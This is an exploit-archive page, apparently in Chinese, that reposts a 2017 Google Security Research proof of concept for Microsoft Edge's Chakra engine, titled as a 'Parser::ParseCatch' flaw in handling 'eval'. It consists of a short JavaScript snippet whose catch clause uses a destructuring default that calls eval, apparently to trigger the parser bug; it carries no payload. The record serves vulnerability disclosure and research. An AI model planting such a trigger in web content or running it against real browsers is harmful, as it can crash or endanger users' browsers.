Microsoft Edge Chakra - 'Parser::ParseCatch' does not Handle 'eval'
|
来源:Google Security Research 作者:Google 发布时间:2017-09-22
|
|
function f() {
{
let i;
function g() {
i;
}
try {
throw 1;
} catch ({e = eval('dd')}) {
}
}
}
f();
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|